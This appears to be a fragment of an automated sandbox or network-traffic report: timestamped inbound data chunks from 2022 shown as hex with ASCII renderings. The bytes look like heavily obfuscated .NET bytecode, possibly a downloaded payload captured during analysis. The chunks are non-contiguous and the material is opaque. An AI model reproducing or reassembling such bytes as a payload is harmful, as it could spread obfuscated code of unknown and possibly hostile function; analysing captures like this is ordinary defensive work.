2022-02-22 14:30:32 UTC 32 IN Data Raw: 08 00 00 38 2d 03 00 00 38 28 03 00 00 20 0b 00 00 00 fe 0c 17 00 3f 8a 00 00 00 20 0b 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 48 09 00 00 20 09 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 09 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 99 08 00 00 20 08 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 08 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 39 08 00 00 38 c0 02 00 00 38 bb 02 00 00 20 0a 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0a 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 94 08 00 00 38 95 02 00 00 38 90 02 00 00 20 0d 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 90 09 00 00 20 0c 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0c 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 10 09 00 00 38 49 02 00 00 38 44 02 00 00 20 0e 00 00 00 fe 0c 17 00 3f 18 00 00 00 Data Ascii: 8-8( ? =8H ?> =8 ? =8988 ? =888 ?> =8 ? =88I8D ?

2022-02-22 14:30:32 UTC 33 IN Data Raw: 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 18 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 Data Ascii: Y X XXJX ' X8. X XXJ Y Y X XXJX '


Direction Data


2022-02-22 14:30:32 UTC 34 IN Data Raw: 0c 08 00 fe 0c 00 00 59 fe 0e 0e 00 20 00 00 00 00 fe 0e 20 00 20 02 00 00 00 fe 0e 18 00 fe 0c 20 00 fe 0c 18 00 58 20 02 00 00 00 5b fe 0e 25 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 22 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 fe 0c 0e 00 fe 0c 22 00 fe 0c 1a 00 58 3c 16 00 00 00 fe 0c 22 00 fe 0c 0e 00 3d 1c 00 00 00 fe 0c 25 00 38 26 00 00 00 fe 0c 25 00 20 01 00 00 00 58 fe 0e 20 00 38 6e ff ff ff fe 0c 25 00 20 01 00 00 00 59 fe 0e 18 00 38 5b ff ff ff 00 fe 0e 12 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 12 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 fe 0e 19 00 20 ff ff ff ff fe 0c 04 00 3b Data Ascii: Y X [% jX% ZXXJ" jX% ZX XXJ"X<"=%8&% X 8n% Y8[ jX ZX XXJ ;

2022-02-22 14:30:32 UTC 36 IN Data Raw: 5a fe 0c 1e 00 fe 0c 16 00 58 4a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 59 5a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0c 00 00 58 fe 0e 1e 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd 44 ee ff ff fe 0c 05 00 fe 0c 1b 00 14 a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 dd 19 ee ff ff fe 0c 02 00 fe 0c 1b 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 0a 00 00 1b fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 10 00 fe 0c 1b 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd b8 ed ff ff fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 fe 0c 1e 00 fe 0c 16 00 58 4a 54 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c Data Ascii: ZXJ XXJYZ XXJXX YD X Y Yt YT Y YXJT

2022-02-22 14:30:32 UTC 37 IN Data Raw: 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 8b 00 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe Data Ascii: ' X8.X XXJ Y YX XXJX' X8X XXJ X X

2022-02-22 14:30:32 UTC 38 IN Data Raw: 00 5a 58 fe 0e 1e 00 dd d0 e3 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 04 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 18 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 20 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 25 00 fe 0c 1a 00 fe 0c 18 00 fe 0c 25 00 58 3c 16 00 00 00 fe Data Ascii: ZX ;O ;I' Y @0 TY X [ jX ZXXJ jX ZX XXJ%%X<

2022-02-22 14:30:32 UTC 40 IN Data Raw: 02 00 00 00 fe 09 02 00 a2 20 01 00 00 00 8d 03 00 00 01 fe 0e 27 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 1a 00 00 01 fe 0e 11 00 7f 5a 00 00 04 fe 0e 00 00 fe 0c 00 00 fe 0e 1e 00 fe 0c 1e 00 fe 0e 08 00 00 fe 0c 15 00 20 01 00 00 00 3b 2a 1f 00 00 fe 0c 1e 00 fe 0e 08 00 fe 0c 1e 00 46 fe 0e 17 00 fe 0c 1e 00 20 01 00 00 00 58 fe 0e 1e 00 fe 0c 17 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 17 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 17 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 ba 0a 00 00 20 06 00 00 00 fe 0c 17 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 6d 08 00 00 20 03 00 00 00 fe 0c 17 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 96 07 00 00 20 01 00 00 00 fe Data Ascii: ' Z ;*F X ? = ? =8 ? =8m ?d =8

2022-02-22 14:30:32 UTC 41 IN Data Raw: 02 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 19 00 fe 0c 19 00 fe 0e 20 00 00 fe 0c 20 00 20 ff ff ff ff 3b 9f 02 00 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a 20 00 00 00 00 40 89 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 ff ff ff ff 3b 62 00 00 00 fe 0c 13 00 fe 0c 09 00 9a 25 14 40 25 00 00 00 26 fe 0c 13 00 fe 0c 09 00 fe 0c 1c 00 fe 0c 09 00 a3 13 00 00 01 28 18 00 00 0a a2 fe 0c 13 00 fe 0c 09 00 9a 00 fe 0c 0c 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 20 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 01 00 00 00 Data Ascii: X (XXJ ; X XXJ @ X XXJ ;b%@%&((!: X (XXJ 8I X XXJ

2022-02-22 14:30:32 UTC 42 IN Data Raw: 00 dd 95 f5 ff ff fe 0c 05 00 fe 0c 1b 00 fe 0c 24 00 fe 0c 1e 00 fe 0c 16 00 58 4a 9a a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd 4e f5 ff ff fe 0c 05 00 fe 0c 1b 00 20 03 00 00 00 59 9a 74 1c 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 21 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 20 00 00 01 7e 18 00 00 04 fe 0c 1e 00 fe 0c 16 00 58 4a 97 29 2b 00 00 11 fe 0c 1b 00 20 03 00 00 00 59 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd dc f4 ff ff fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 0a 00 00 1b 7e 18 00 00 Data Ascii: $XJ X XN Yt Yt! Yt ~XJ)+ Y X Y Y Yt~

2022-02-22 14:30:32 UTC 44 IN Data Raw: 0f 00 38 6e ff ff ff fe 0c 20 00 20 01 00 00 00 59 fe 0e 0e 00 38 5b ff ff ff 00 fe 0e 1a 00 fe 0c 00 00 20 48 01 00 00 58 fe 0c 1a 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 fe 0c 12 00 3b bd 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 20 ff ff ff ff 3b 78 00 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 14 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 21 00 9e fe 0c 27 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 30 00 00 00 00 fe 0c 00 00 fe 0c 12 00 58 fe 0c 16 00 58 Data Ascii: 8n Y8[ HX ZX XXJ!!;X XXJ!! ;x!X XXJ !X XXJX!' X80XX

2022-02-22 14:30:32 UTC 45 IN Data Raw: 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 1a 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 09 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 Data Ascii: (!:X (XXJ8IX XXJ ; ;EX XXJ Y YX XXJX' X8.

2022-02-22 14:30:32 UTC 46 IN Data Raw: 00 fe 0c 19 00 58 fe 0c 16 00 58 4a fe 0e 19 00 38 42 fe ff ff 38 12 00 00 00 00 fe 0c 04 00 fe 0e 1e 00 20 ff ff ff ff fe 0e 04 00 00 00 dd 5d e5 ff ff fe 0c 1e 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 15 00 5a 58 fe 0e 1e 00 dd 2e e5 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd f0 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe Data Ascii: XXJ8B8 ]((%~a Y ZX. ;O ;I' Y @0 TY X [


Direction Data


2022-02-22 14:30:32 UTC 48 IN Data Raw: fe 0e 09 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 01 00 a2 7f 5b 00 00 04 fe 0e 03 00 fe 0c 03 00 fe 0e 07 00 fe 0c 07 00 fe 0e 05 00 00 fe 0c 00 00 20 01 00 00 00 3b d8 03 00 00 fe 0c 07 00 fe 0e 05 00 fe 0c 07 00 46 fe 0e 0a 00 fe 0c 07 00 20 01 00 00 00 58 fe 0e 07 00 fe 0c 0a 00 20 01 00 00 00 3f 69 01 00 00 fe 0c 0a 00 20 09 00 00 00 3d 5b 01 00 00 20 05 00 00 00 fe 0c 0a 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 50 02 00 00 20 02 00 00 00 fe 0c 0a 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 20 01 00 00 20 01 00 00 00 fe 0c 0a 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 f9 00 00 00 38 f3 00 00 00 38 ee 00 00 00 20 Data Ascii: [ ;F X ?i =[ ? =8P ?> =8 ? =888

2022-02-22 14:30:32 UTC 49 IN Data Raw: 64 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 16 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a8 00 00 00 38 a2 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 88 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 05 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 32 01 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 ca 00 00 00 38 30 00 00 00 38 2b 00 00 00 20 06 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 06 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 58 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 c7 fe ff ff fe 0c 0d 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 08 00 fe 0c 01 00 58 4a 9a a2 fe Data Ascii: d =8 ? =88 ? =88|8w ?> =82 ? =8808+ ? =8X888XJ

2022-02-22 14:30:32 UTC 50 IN Data Raw: 03 00 00 20 0d 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0d 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 89 03 00 00 38 30 00 00 00 38 2b 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 e4 03 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 71 fd ff ff fe 0c 09 00 fe 0c 04 00 fe 0c 07 00 fe 0c 05 00 fe 0c 10 00 58 4a 9a a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 fe 0c 05 00 20 08 00 00 00 58 fe 0e 05 00 38 2a fd ff ff fe 0c 09 00 fe 0c 04 00 14 a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 38 ff fc ff ff fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 09 00 fe 0c 04 00 20 02 00 00 00 59 9a fe 0c 09 00 fe 0c 04 00 20 01 Data Ascii: ? =8808+ ? =8888qXJ X X8* X8 Y Y

2022-02-22 14:30:32 UTC 52 IN Data Raw: 08 00 fe 0c 09 00 20 01 00 00 00 3f 8f 01 00 00 fe 0c 09 00 20 0a 00 00 00 3d 81 01 00 00 20 05 00 00 00 fe 0c 09 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 54 02 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 46 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 1f 01 00 00 38 19 01 00 00 38 14 01 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 41 01 00 00 38 ee 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 62 01 00 00 38 c8 00 00 00 38 c3 00 00 00 20 08 00 00 00 fe 0c 09 00 3f 64 00 00 00 20 08 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 9d 02 00 00 20 06 Data Ascii: ? = ? =8T ?> =8F ? =888 ? =8A8 ? =8b88 ?d =8

2022-02-22 14:30:32 UTC 53 IN Data Raw: 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 0d 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 0d 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 0d 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 12 07 00 00 20 06 00 00 00 fe 0c 0d 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 bc 04 00 00 20 03 00 00 00 fe 0c 0d 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 cc 03 00 00 20 01 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 5e 03 00 00 38 58 03 00 00 20 02 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 3e 03 00 00 38 32 03 00 00 38 2d 03 00 00 20 04 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 85 03 00 00 38 07 Data Ascii: X ? = ? =8 ? =8 ?d =8 ? =8^8X ? =8>828- ? =88

2022-02-22 14:30:32 UTC 54 IN Data Raw: 00 00 00 59 8f 04 00 00 01 e0 4a fe 01 54 fe 0c 04 00 fe 0c 10 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 51 fa ff ff fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 07 fa ff ff fe 0c 04 00 fe 0c 10 00 20 00 00 00 00 9c fe 0c 03 00 fe 0c 10 00 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 47 54 fe 0c 05 00 fe 0c 10 00 14 a2 fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 ab f9 ff ff fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 00 00 fe 0c 0a 00 Data Ascii: YJT Y Y8QXJ YJR X Y8 XJGT X X8 YJ

2022-02-22 14:30:32 UTC 58 IN Data Raw: 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 d2 f6 ff ff fe 0c 09 00 fe 0c 10 00 fe 0c 00 00 fe 0c 08 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 07 00 fe 0c 10 00 20 05 00 00 00 9c fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 8b f6 ff ff fe 0c 07 00 fe 0c 10 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 9a 74 0b 00 00 1b fe 0c 09 00 fe 0c 10 00 20 02 00 00 00 59 9a 74 0c 00 00 1b fe 0c 09 00 fe 0c 10 00 20 01 00 00 00 59 9a 74 0d 00 00 1b 7e 1e 00 00 04 fe 0c 08 00 fe 0c 0e 00 58 4a 97 29 36 00 00 11 a2 fe 0c 10 00 20 02 00 00 00 59 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 f6 f5 ff ff fe 0c 07 00 Data Ascii: X X8XJ X X8 Y Y Yt Yt Yt~XJ)6 Y X8

2022-02-22 14:30:32 UTC 62 IN Data Raw: 0f 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 7e f6 ff ff fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 34 f6 ff ff fe 0c 0b 00 fe 0c 0f 00 20 00 00 00 00 9c fe 0c 09 00 fe 0c 0f 00 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 01 00 fe 0c 0f00 14 a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d8 f5 ff ff fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a Data Ascii: Y Y8~XJ YJR X Y84 XJGT X X8 YJ XJ XXJYZ

2022-02-22 14:30:32 UTC 64 IN Data Raw: 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a 74 21 00 00 01 7e 1f 00 00 04 fe 0c 0c 00 fe 0c 03 00 58 4a 97 29 42 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 56 f2 ff ff fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 17 f2 ff ff fe 0c 0b 00 fe 0c 0f 00 20 05 00 00 00 9c fe 0c 01 00 fe 0c 0f 00 fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a 9a a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d0 f1 ff ff fe 0c 09 00 fe 0c 0f 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 01 00 fe 0c 0f 00 20 02 00 00 00 59 9a 74 23 00 00 01 fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 0b Data Ascii: Yt!~XJ)B X8VXJ Y X Y8 XJ X X8 Y Yt# YT

2022-02-22 14:30:32 UTC 68 IN Data Raw: 2a 2a fe 09 00 00 6f 36 00 00 0a 2a 2a fe 09 00 00 6f 37 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 38 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 28 39 00 00 0a 2a 2a fe 09 00 00 6f 3a 00 00 0a 2a 2a fe 09 00 00 6f 3b 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3c 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3d 00 00 0a 2a 00 13 30 03 00 dc 00 00 00 00 00 00 00 20 0c 00 00 00 8d 06 00 00 01 80 1f 00 00 04 7e 1f 00 00 04 20 00 00 00 00 fe 06 77 00 00 06 9b 7e 1f 00 00 04 20 01 00 00 00 fe 06 78 00 00 06 9b 7e 1f 00 00 04 20 02 00 00 00 fe 06 79 00 00 06 9b 7e 1f 00 00 04 20 03 00 00 00 fe 06 7a 00 00 06 9b 7e 1f 00 00 04 20 04 00 00 00 fe 06 7b 00 00 06 9b 7e 1f 00 00 04 20 05 00 00 00 fe 06 7c 00 00 06 9b 7e 1f 00 00 04 20 06 00 00 00 fe 06 7d 00 00 06 9b 7e 1f 00 Data Ascii: **o6**o7*:o8*:(9**o:**o;*:o<*:o=*0 ~ w~ x~ y~ z~ {~ |~ }~


Direction Data


